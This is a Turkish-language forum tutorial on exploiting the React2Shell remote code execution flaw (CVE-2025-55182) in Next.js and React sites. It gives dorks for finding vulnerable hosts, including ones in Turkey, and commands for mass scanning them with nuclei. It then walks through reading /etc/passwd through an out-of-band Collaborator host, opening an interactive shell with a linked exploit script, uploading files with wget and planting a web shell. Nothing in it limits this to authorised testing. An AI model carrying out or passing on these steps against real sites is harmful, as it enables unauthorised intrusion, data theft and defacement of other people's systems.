Selam Dostlar,
Bugün 2025 yılının son ayında çıkan kritik seviye "RCE" React2Shell (CVE-2025–55182) açığından ve nasıl istismar edebileceğinizden bahsedeceğim.
Next.js & React ile oluşturulmuş siteleri nasıl bulabileceğiniz konusunda en altta dorkları paylaştım bakabilirsiniz.
1. Adım
Öncelikle nuclei ile vuln check yapacağız templateimizin ismi CVE-2025-55182.yaml
(Dorklarla çektiğim ip ve domainleri vulnalive.txt olarak kayıt ettim.)
Kod:
cat vulnalive.txt | nuclei -t /home/EFETR/nuclei-templates/http/cves/2025/CVE-2025-55182.yaml -c 30
Taramamız bitti ve sonuçları aldık şimdi "BurpSuite" programımızı açalım.
Manuel olarak uzaktan kod yürütme ile istismar etmeye çalışacağız.
2. Adım
BurpSuite Repeater kısmından
GET ile normal şekilde girdiğim siteye "change request method" tıklayıp "POST" olarak çeviriyoruz.
Yine altta dosyalarını vericeğim 1. payloadımızı giriyoruz.
Not: User-Agent'tan itibaren silip giriyoruz payloadımızı.
Evet gördüğünüz gibi sistemden "UID" bilgilerini çekmiş olduk.
2. Payloadımıza gelelim bunun için bir "Collaborator ağı" oluşturacağız, neyseki BurpSuite ile kolayca halledebiliyoruz
Collaborator kısmına gelip başlatıyoruz ve adresimizi kopyalıyoruz "Copy the clipboard" diyoruz.
Ardından payload içerisinde olan adresi silip, kendi adresimizi yapıştırıyoruz.
Send dedikten sonra "Collaborator" kısmına gelip "HTTP" olan değere tıklıyoruz ve "/etc/passwd" dosyasını okuyoruz.
(Eğer sonuç gelmezse "Poll now" butonuna basın)
3. Adım
Altta vereceğim repoyu indiriyoruz.
Bu repo ile bu manuel olarak yaptığımız işlemlerin hepsini neredeyse yapabiliyoruz.
Kod:
python CVE-2025-55182-exploit.py -u https://targetsiteniz.com --shell
Sitemize interaktif shell ile bağlandık
4. Son Adım
Wget ile dosya yükleme iznimiz var mı deniyoruz (her sitede izin olmadığı için yükleyemeyebiliyoruz)
Ben Github Repomdaki index.html dosyamı direkt deniyorum.
Bingo yüklendi. Fakat dikkat ederseniz ilk denemede yapamadı ve tekrar kendisi denedi yüklenmedi diye geçmeyin ls çekmeyi unutmayın.
Son olarak shell atmak kaldı.
Yine aynı şekil sıkıntısız uploadımızı gerçekleştirdik.
index.html
Shell
Sorularınız olursa konu altına yazabilirisiniz. Teşekkür ederim adam:
Dorklar;
Shodan
http.component:"next.js,react"
http.component:"next.js,react" country:"TR"
http.component:"Next.js"
Shodan Cli Dork
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt
ZoomEye
http.body="react.production.min.js" || http.body="React.createElement(" || app="React Router" || app="React.js"
vul.cve="CVE-2025-55182"
FOFA
app="NEXT.JS" || app="React.js"
app="NEXT.JS" || app="React.js" && country="TR"
Not: En iyi çıktıları "FOFA" veriyor bana göre.
Diğer Materyaller
Vuln Check Yaptığımız Template :
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-55182.yaml
RCE Shell Repo :
https://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell.git
Payloadlar :
https://www.mediafire.com/file/dkv1cwuv2wapx47/Payloadlar.rar/file
